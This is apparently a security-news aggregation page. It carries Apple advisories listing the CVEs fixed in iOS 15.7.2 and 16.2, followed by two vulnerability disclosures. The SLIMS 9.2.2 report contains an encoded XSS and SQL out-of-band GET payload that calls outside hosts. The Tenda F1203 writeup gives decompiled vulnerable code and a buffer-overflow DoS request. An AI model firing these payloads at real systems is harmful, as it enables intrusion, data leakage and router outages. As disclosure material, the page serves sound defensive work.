within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 15.7.2 and iPadOS 15.7.2".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmOZFYIACgkQ4RjMIDkeNxn07xAA2gJjgY+Ql7WKtXSxsU4snP+8d2zDgD5hKkZVETJrKG1TGwAKK/YdW0Ug8nmj/DIU+RRsU8KpGLiN4TGsHVot1GaDwwMQ/HCUG4bHFjknc0TqrTkUCfG6rnkhbFouinoNfyPf7gcmLkQg2AhrNjA/a9QJzfmX2XKtGybIN1kFDd8eMKb/setgVQUS12h4N6YBI4WjSGvyZ8vagqpMRAz0An4lSEoa21CN1ViM0E4wBWIyU8Ux05fN+Lvn2gefdjyGV5IP63z3kYe4D/Vt6yatBo1n7ERM9If7IMGO5O8DJqrynTZ3q1kCsxcRQheJHkPZDF/8ogjAdNiOzqybSzhhcNk0uteTSXX1tYGvRos7GyDSTG6/KjuFvB60Wohwzr16o6VkcZyaU41cA9dWKrv3+RRTm7UR2/CKGngrjcnm4jAotR+pjtQU444vECGQVTx/qat7Eu+IFe2llm8JcjBHjx1R6Rbb8sqmzD4lVDja/aZ2491vsVdOytq+cZ59nZqwbG7vo8mBow+zEcoKsh8pAGRYoLW3WU1MetNt04V9d+7Fv7wG/+BNkzHNqOhOa7+4SwD8wvApxdF2+hZgSD26owwkbfG4hnf71w4DSDPpwRC/CoRvhDMZToSlsPLIWP29jIII09N8TNW3PVlIAjquv7oxir7BohtGu5ioSmgI3fQ==wLMf-----END PGP SIGNATURE-----

Apple Security Advisory 2022-12-13-2

Apple Security Advisory 2022-12-13-1 - iOS 16.2 and iPadOS 16.2 addresses bypass, code execution, out of bounds write, spoofing, and use-after-free vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2022-12-13-1 iOS 16.2 and iPadOS 16.2iOS 16.2 and iPadOS 16.2 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213530.AccountsAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: A user may be able to view sensitive user informationDescription: This issue was addressed with improved data protection.CVE-2022-42843: Mickey Jin (@patch1t)AppleAVDAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: Parsing a maliciously crafted video file may lead to kernelcode executionDescription: An out-of-bounds write issue was addressed with improvedinput validation.CVE-2022-46694: Andrey Labunets and Nikita TarakanovAppleMobileFileIntegrityAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to bypass Privacy preferencesDescription: This issue was addressed by enabling hardened runtime.CVE-2022-42865: Wojciech Reguła (@_r3ggi) of SecuRingAVEVideoEncoderAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: A logic issue was addressed with improved checks.CVE-2022-42848: ABC Research s.r.oCoreServicesAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to bypass Privacy preferencesDescription: Multiple issues were addressed by removing thevulnerable code.CVE-2022-42859: Mickey Jin (@patch1t), Csaba Fitzl (@theevilbit) ofOffensive SecurityGPU DriversAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to disclose kernel memoryDescription: The issue was addressed with improved memory handling.CVE-2022-46702: Xia0o0o0o of W4terDr0p, Sun Yat-sen UniversityGraphics DriverAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: The issue was addressed with improved memory handling.CVE-2022-42850: Willy R. Vasquez of The University of Texas at AustinGraphics DriverAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: Parsing a maliciously crafted video file may lead tounexpected system terminationDescription: The issue was addressed with improved memory handling.CVE-2022-42846: Willy R. Vasquez of The University of Texas at AustinImageIOAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: Processing a maliciously crafted file may lead to arbitrarycode executionDescription: An out-of-bounds write issue was addressed with improvedinput validation.CVE-2022-46693: Mickey Jin (@patch1t)ImageIOAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: Parsing a maliciously crafted TIFF file may lead todisclosure of user informationDescription: The issue was addressed with improved memory handling.CVE-2022-42851: Mickey Jin (@patch1t)IOHIDFamilyAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: A race condition was addressed with improved statehandling.CVE-2022-42864: Tommy Muir (@Muirey03)IOMobileFrameBufferAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: An out-of-bounds write issue was addressed with improvedinput validation.CVE-2022-46690: John Aakerblom (@jaakerblom)iTunes StoreAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: A remote user may be able to cause unexpected app terminationor arbitrary code executionDescription: An issue existed in the parsing of URLs. This issue wasaddressed with improved input validation.CVE-2022-42837: Weijia Dai (@dwj1210) of Momo SecurityKernelAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: A race condition was addressed with additionalvalidation.CVE-2022-46689: Ian Beer of Google Project ZeroKernelAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: Connecting to a malicious NFS server may lead to arbitrarycode execution with kernel privilegesDescription: The issue was addressed with improved bounds checks.CVE-2022-46701: Felix Poulin-BelangerKernelAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: A remote user may be able to cause kernel code executionDescription: The issue was addressed with improved memory handling.CVE-2022-42842: pattern-f (@pattern_F_) of Ant Security Light-YearLabKernelAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to break out of its sandboxDescription: This issue was addressed with improved checks.CVE-2022-42861: pattern-f (@pattern_F_) of Ant Security Light-YearLabKernelAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to break out of its sandboxDescription: The issue was addressed with improved memory handling.CVE-2022-42844: pattern-f (@pattern_F_) of Ant Security Light-YearLabKernelAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app with root privileges may be able to execute arbitrarycode with kernel privilegesDescription: The issue was addressed with improved memory handling.CVE-2022-42845: Adam Doupé of ASU SEFCOMPhotosAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: Shake-to-undo may allow a deleted photo to be re-surfacedwithout authenticationDescription: The issue was addressed with improved bounds checks.CVE-2022-32943: an anonymous researcherpppAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: The issue was addressed with improved memory handling.CVE-2022-42840: an anonymous researcherPreferencesAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to use arbitrary entitlementsDescription: A logic issue was addressed with improved statemanagement.CVE-2022-42855: Ivan Fratric of Google Project ZeroPrintingAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to bypass Privacy preferencesDescription: This issue was addressed by removing the vulnerablecode.CVE-2022-42862: Mickey Jin (@patch1t)SafariAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: Visiting a website that frames malicious content may lead toUI spoofingDescription: A spoofing issue existed in the handling of URLs. Thisissue was addressed with improved input validation.CVE-2022-46695: KirtiKumar Anandrao RamchandaniSoftware UpdateAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: A user may be able to elevate privilegesDescription: An access issue existed with privileged API calls. Thisissue was addressed with additional restrictions.CVE-2022-42849: Mickey Jin (@patch1t)WeatherAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to read sensitive location informationDescription: The issue was addressed with improved handling ofcaches.CVE-2022-42866: an anonymous researcherWebKitAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: Processing maliciously crafted web content may lead toarbitrary code executionDescription: A use after free issue was addressed with improvedmemory management.WebKit Bugzilla: 245521CVE-2022-42867: Maddie Stone of Google Project ZeroWebKitAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: Processing maliciously crafted web content may lead toarbitrary code executionDescription: A memory consumption issue was addressed with improvedmemory handling.WebKit Bugzilla: 245466CVE-2022-46691: an anonymous researcherWebKitAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: Processing maliciously crafted web content may bypass SameOrigin PolicyDescription: A logic issue was addressed with improved statemanagement.WebKit Bugzilla: 246783CVE-2022-46692: KirtiKumar Anandrao RamchandaniWebKitAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: Processing maliciously crafted web content may result in thedisclosure of process memoryDescription: The issue was addressed with improved memory handling.CVE-2022-42852: hazbinhotel working with Trend Micro Zero DayInitiativeWebKitAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: Processing maliciously crafted web content may lead toarbitrary code executionDescription: A memory corruption issue was addressed with improvedinput validation.WebKit Bugzilla: 246942CVE-2022-46696: Samuel Groß of Google V8 SecurityWebKit Bugzilla: 247562CVE-2022-46700: Samuel Groß of Google V8 SecurityWebKitAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: Processing maliciously crafted web content may disclosesensitive user informationDescription: A logic issue was addressed with improved checks.CVE-2022-46698: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs& DNSLab, Korea Univ.WebKitAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: Processing maliciously crafted web content may lead toarbitrary code executionDescription: A memory corruption issue was addressed with improvedstate management.WebKit Bugzilla: 247420CVE-2022-46699: Samuel Groß of Google V8 SecurityWebKit Bugzilla: 244622CVE-2022-42863: an anonymous researcherAdditional recognitionKernelWe would like to acknowledge Zweig of Kunlun Lab and pattern-f(@pattern_F_) of Ant Security Light-Year Lab for their assistance.Safari ExtensionsWe would like to acknowledge Oliver Dunk and Christian R. of1Password for their assistance.WebKitWe would like to acknowledge an anonymous researcher and scarlet fortheir assistance.This update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 16.2 and iPadOS 16.2".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmOZFYIACgkQ4RjMIDkeNxmnGxAAuO8CwNDPYn+yyq7VIRB6+sCaV962MC2c7TFzU+R1waBBaG57NmJQeANL5645QVNL/5k0TaFiSV/dFg15YvBkLgC6JVHeKebYvboSHB0wsfxejfwYnYFLNc44xriqdQSarmp61Aw4270LFRjV1XokOGuEzo4U3InyhiawceAVR/qvteNDxETnsiANjyaPRnx1d2K22+VZAFRtVjLgFLkBwAguamuMe8vIaqP71giORZNfX+w+GduszAqYSpo5aPC8G56GmHGZnSid/utBa2CqXfVRMyUmnYYukPrYACdy4WkTKWOWCbPrCbkTVWc43jsWhPqsMFopyy4K+SaCZqNdcpIag8n5uvCsf0tLPIUPTMRXSj3w1WOq1++6NV3cZp6RaFVYJ3twU2D1q/Vj8VXILNPvECzGNlOxRJu0H7w3VD5ZdZ16Gsc8T62CER5CSJr49fj5ixLCP9HepmIK5Rz0UXMxmylUANk2h88HK9hr7/s1EOYtCVjTEYQ2c1ESd87HYz24iYnqaL5d8KDFiGQCVfuwnz2keWO7Lc2E+8OUqqYTWfCoSWprWnSUZR31xA+JnPSS4WBP4RzitUmAiP5sdulF0jg4IZ0y0RUwWI4lD4vv0z9glb++rRHhPJj9uuirFcmKJ1BSfEN1glq/gGW8SP1vuq1BU+fIdeHtw4XeeIw==qV7H-----END PGP SIGNATURE-----

Apple Security Advisory 2022-12-13-1

Senayan Library Management System version 9.2.2 suffers from a cross site scripting vulnerability.

    ## Title: Senayan Library Management System v9.2.2 a.k.a SLIMS 9 XSS-Reflected - inserting gif - redirect to outside HTTPS server## Author: nu11secur1ty## Date: 12.21.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.2.2## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.2## Description:The value of manual insertion `point 3` is copied into the HTMLdocument as plain text between tags.The payload t8xqv<script>alert(1)</script>uou2q was submitted in themanual insertion `point 3`.This input was echoed unmodified in the application's response.The attacker can trick the already authenticated users to visit a verydangerous web page or malicious javascript exploit.## STATUS: HIGH Vulnerability[+] Payloads:```GETGET /slims9_bulian-9.2.2/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%6e%75%31%31%73%65%63%75%72%31%74%79%2e%63%6f%6d%2f%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id%5c%5cwtf%27))%2b%27%27%2b(select%20load_file(%27%5c%5c%5c%5cazditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id%5c%5cdzd%27))%2b%27HTTP/1.1Host: pwnedhost.comCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=ijs22qmki227r86feh6bppc56o; admin_logged_in=1Connection: close```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.2)## Proof and Exploit:[href](https://streamable.com/mnpw30)## Time spent`00:05:00`

Senayan Library Management System 9.2.2 Cross Site Scripting

Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the urls parameter at /goform/saveParentControlInfo.

Tenda Router **F1203 V2.0.1.6** was discovered to contain a buffer overflow in the httpd module when handling /goform/saveParentControlInfo request.

This vulnerability lies in the /goform/saveParentControlInfo page，The details are shown below:

    int __fastcall saveParentControlInfo(int a1)
    {
      int v2; // $v0
      int v3; // $v0
      void *dest; // [sp+30h] [+30h] BYREF
      void *ptr; // [sp+34h] [+34h]
      int v6; // [sp+38h] [+38h]
      int v7; // [sp+3Ch] [+3Ch]
      int i; // [sp+40h] [+40h]
      int v9; // [sp+44h] [+44h]
      int v10; // [sp+48h] [+48h]
      char *nptr; // [sp+4Ch] [+4Ch]
      char *v12; // [sp+50h] [+50h]
      char *v13; // [sp+54h] [+54h]
      char *urls_value; // [sp+58h] [+58h]
      char *v15; // [sp+5Ch] [+5Ch]
      char *time_value; // [sp+60h] [+60h]
      char *v17; // [sp+68h] [+68h]
      char *deviceId_value; // [sp+6Ch] [+6Ch]
      char v19[64]; // [sp+70h] [+70h] BYREF
      char v20[512]; // [sp+B0h] [+B0h] BYREF
      int v21; // [sp+2B0h] [+2B0h] BYREF
      __int16 v22; // [sp+2B4h] [+2B4h] BYREF
      unsigned __int8 v23; // [sp+2B6h] [+2B6h] BYREF
      char v24[120]; // [sp+2B8h] [+2B8h] BYREF
      char v25[128]; // [sp+330h] [+330h] BYREF
      int v26; // [sp+3B0h] [+3B0h] BYREF
      int v27[5]; // [sp+3B4h] [+3B4h] BYREF
      int v28[8]; // [sp+3C8h] [+3C8h] BYREF
      int v29[8]; // [sp+3E8h] [+3E8h] BYREF
    
      memset(v19, 0, sizeof(v19));
      memset(v20, 0, sizeof(v20));
      v21 = 0;
      v22 = 0;
      v23 = 0;
      deviceId_value = (char *)websGetVar(a1, "deviceId", &unk_4CE8D8);
      v17 = (char *)websGetVar(a1, "enable", &unk_4CE8D8);
      time_value = (char *)websGetVar(a1, "time", &unk_4CE8D8);
      v15 = (char *)websGetVar(a1, "url_enable", &unk_4CE8D8);
      urls_value = (char *)websGetVar(a1, "urls", &unk_4CE8D8);
      v13 = (char *)websGetVar(a1, "day", &unk_4CE8D8);
      v12 = (char *)websGetVar(a1, "block", &unk_4CE8D8);
      nptr = (char *)websGetVar(a1, "connectType", &unk_4CE8D8);
      if ( atoi(nptr) == 1 && atoi(v12) == 1 )
        wl_l2_filter_add(deviceId_value);
      if ( *time_value )
      {
        v28[0] = 0;
        v28[1] = 0;
        v28[2] = 0;
        v28[3] = 0;
        v28[4] = 0;
        v28[5] = 0;
        v28[6] = 0;
        v28[7] = 0;
        v29[0] = 0;
        v29[1] = 0;
        v29[2] = 0;
        v29[3] = 0;
        v29[4] = 0;
        v29[5] = 0;
        v29[6] = 0;
        v29[7] = 0;
        sscanf(time_value, "%[^-]-%s", v28, v29);
        if ( !strcmp((const char *)v28, (const char *)v29) )
        {
          websWrite(
            a1,
            "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
          websWrite(a1, "{\"errCode\":%d}", 1);
          return websDone(a1, 200);
        }
      }
      v10 = 0;
      v9 = 0;
      i = 0;
      memset(v24, 0, sizeof(v24));
      memset(v25, 0, sizeof(v25));
      v7 = 0;
      v26 = 0;
      v6 = 0;
      ptr = malloc(0x254u);
      memset(ptr, 0, 0x254u);
      strcpy((char *)ptr + 2, deviceId_value);
      dest = malloc(0x254u);
      memset(dest, 0, 0x254u);
      *(_WORD *)dest = atoi(v17) != 0;
      strcpy((char *)dest + 2, deviceId_value);
      strcpy((char *)dest + 34, time_value);
      sscanf(
        v13,
        "%d,%d,%d,%d,%d,%d,%d",
        &v21,
        (char *)&v21 + 1,
        (char *)&v21 + 2,
        (char *)&v21 + 3,
        &v22,
        (char *)&v22 + 1,
        &v23);
      if ( !(_BYTE)v21
        && __PAIR16__(BYTE1(v21), 0) == BYTE2(v21)
        && __PAIR16__(HIBYTE(v21), 0) == (unsigned __int8)v22
        && __PAIR16__(HIBYTE(v22), 0) == v23
        && !*v12 )
      {
        for ( i = 0; i < 7; ++i )
          *((_BYTE *)dest + i + 66) = 1;
      }
      else
      {
        for ( i = 0; i < 7; ++i )
          *((_BYTE *)dest + i + 66) = *((_BYTE *)&v21 + i) != 0;
      }
      v2 = atoi(time_value);
      *((_DWORD *)dest + 19) = v2;
      strcpy((char *)dest + 80, urls_value);
      v3 = atoi(v15);
      *((_BYTE *)dest + 592) = v3 != 0;
      v10 = getparentcontrolinfo(0, &v26, ptr);
      if ( v10 <= 0 )
      {
        if ( !atoi(v17) && atoi(v12) != 1 )
        {
    LABEL_28:
          free(ptr);
          free(dest);
          websWrite(
            a1,
            "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
          websWrite(a1, "{\"errCode\":%d}", 0);
          return websDone(a1, 200);
        }
        if ( *v12 )
        {
          v6 = atoi(v12);
          if ( v6 == 1 )
          {
            *(_BYTE *)dest = 0;
            *((_BYTE *)dest + 1) = 1;
            for ( i = 0; i < 7; ++i )
              *((_BYTE *)dest + i + 66) = 1;
            strcpy((char *)dest + 34, "00:00-24:00");
          }
        }
        v9 = bm_get_id_list("parent.control.id", v24, 30);
        if ( v9 )
        {
          if ( v9 >= 30 )
          {
            free(ptr);
            free(dest);
            websWrite(
              a1,
              "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
            websWrite(a1, "{\"errCode\":%d}", 1);
            return websDone(a1, 200);
          }
          for ( i = 0; i != 30; ++i )
          {
            if ( !*(&dest + i + 162) )
            {
              v26 = i + 1;
              break;
            }
          }
          GetValue("parent.control.id", v20);
          sprintf(v25, "%s,%d", v20, v26);
          SetValue("parent.control.id", v25);
          setparentcontrolinfo(v10, v26, dest);
        }
        else
        {
          SetValue("parent.control.id", "1");
          v26 = 1;
          setparentcontrolinfo(v10, 1, dest);
        }
      }
      else
      {
        if ( atoi(v17) )
        {
          *((_DWORD *)dest + 19) = *((_DWORD *)ptr + 19);
        }
        else
        {
          memcpy(dest, ptr, 0x254u);
          *(_BYTE *)dest = 0;
        }
        if ( *v12 )
        {
          v6 = atoi(v12);
          memcpy(dest, ptr, 0x254u);
          if ( v6 == 1 )
          {
            *(_BYTE *)dest = 0;
            *((_BYTE *)dest + 1) = 1;
          }
          else
          {
            *((_BYTE *)dest + 1) = 0;
          }
        }
        if ( !memcmp(ptr, dest, 0x254u) )
          goto LABEL_28;
        setparentcontrolinfo(v10, v26, dest);
      }
      free(ptr);
      free(dest);
      v27[0] = 0;
      v27[1] = 0;
      v27[2] = 0;
      v27[3] = 0;
      v27[4] = 0;
      sprintf((char *)v27, "op=%d", 5);
      send_msg_to_netctrl(14, v27);
      send_msg_to_netctrl(41, v27);
      CommitCfm();
      websWrite(
        a1,
        "HTTP/1.1 200 OK\nContent-type: text/plain; charset=utf-8\nPragma: no-cache\nCache-Control: no-cache\n\n");
      websWrite(a1, "{\"errCode\":%d}", 0);
      return websDone(a1, 200);
    }
    

This POC can result in a Dos.

    POST /goform/saveParentControlInfo HTTP/1.1
    Host: 192.168.204.143
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: user=admin
    Connection: close
    Content-Length: 4106
    
    urls=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa